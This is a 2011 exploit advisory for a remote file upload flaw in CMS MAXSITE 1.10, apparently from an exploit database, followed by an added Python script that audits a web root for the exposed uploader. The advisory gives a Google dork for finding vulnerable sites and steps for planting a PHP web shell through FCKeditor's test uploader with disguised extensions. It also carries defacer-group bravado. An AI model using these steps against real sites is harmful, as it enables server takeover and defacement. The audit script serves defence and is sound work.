CMS MAXSITE Remote File Upload Vulnerability <= 1.10



EKU-ID: 1219 CVE: OSVDB-ID:
Author: HashoR Published: 2011-10-31 Verified: Verified


=================================================================================

Web             : ashiyane.org

e-mail          : HashoR [DOT] BlackHat [AT] Gmail.Com             

                      #########################################
                       I'm HashoR , member from ashiyane.org
                            -!We Love KurDestaN!-
                      #########################################

================================================================================
------|-------------------------------------------------------|------
####
# Exploit : CMS MAXSITE Remote File Upload Vulnerability <= 1.10
# Author : HashoR
# Vendor or Software Link : http://maxsite.geniuscyber.com/index.php?name=index
# Version : 1.10
# Team: Ashiyane Digital Security Team
# E-mail: HashoR [DOT] BlackHat [AT] Gmail.Com
# Google Dork: intitle:"## MAXSITE 1.10 ##"
# Tested on : LinuX
####

# Explo!T:
# G0 To :  http://site.com/Path/FCKeditor/editor/filemanager/upload/test.html
## Select the "File Uploader" to use: Php
### upload sh3ll.php6 0r sh3ll.php;.jpg ...........
#### go to http://site.com/UserFiles/File/sh3ll.php6

# DemO:

###
[+] LoL.......
# By HashoR!   
• We Will Never Stop Hacking
                           • Its not a game
                                            • It's Our Job
                              enjoy!       
||> Special Greeting To: All members in Ashiyane.org

####
# Owned BoX:

Behrooz_Ice - Q7x - Sha2ow - Virangar - Azazel - Ali_Eagle - keivan
taghva - elvator - mmilad200 - PrinceofHacking - iman_taktaz - ERroR
Black - Rz04 - ruin3r - Gladiator - unique2world - EroRR
M3QD4D - Http://Askn - Classic - n3me3iz - Zend - r3d.z0nE
HIDDEN-HUNTER - Hijacker - AliAkh - A.S.P.I.R.I.N - *Alexander* - Pr0grammer- HASSAN20- AR455

Greetz: hashor- ArmanSoftware - removal_load - B3HR0Z - @Master - Satanic2000 - N4H - angola
And All Ashiyane Defacers
------|-------------------------------------------------------|------
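
For site owners checking their own installation against the upload steps above, the following audit is an added example, not part of the original advisory or of MAXSITE/FCKeditor. It walks a web root, reports the FCKeditor test uploader page, and flags files under UserFiles whose names resemble the ones in the advisory (`.php6`, `.php;.jpg`). The allowlist, the script-extension list and the function names are assumptions to adjust per site.

```python
import os
import re

# Assumption: file types this site legitimately stores under UserFiles.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
# Assumption: extensions a PHP/Apache host may hand to a script handler.
SCRIPT_EXT = re.compile(r"^(php\d?|phtml|pht|phar|cgi|pl|asp|aspx|jsp)$", re.I)
# Uploader test page path, as given in the advisory.
TEST_PAGE = "FCKeditor/editor/filemanager/upload/test.html"


def classify_upload(filename):
    """Return a reason string if the name is unsafe, or None if acceptable."""
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or name.startswith("."):
        return "empty or hidden name"
    if re.search(r"[;:%\x00-\x1f]", name):
        return "separator or control character in name"
    parts = name.split(".")
    if len(parts) < 2:
        return "no extension"
    # Inspect every dot-separated segment, not only the last one.
    for seg in parts[1:]:
        if SCRIPT_EXT.match(seg):
            return "script extension '%s'" % seg
    if parts[-1].lower() not in ALLOWED_EXT:
        return "extension not on allowlist"
    return None


def audit_webroot(root):
    """Report the exposed test uploader and risky files under UserFiles."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
        for f in files:
            path = rel + "/" + f
            if path.endswith(TEST_PAGE):
                findings.append((path, "FCKeditor test uploader present"))
            elif "/UserFiles/" in "/" + path:
                reason = classify_upload(f)
                if reason:
                    findings.append((path, reason))
    return sorted(findings)
```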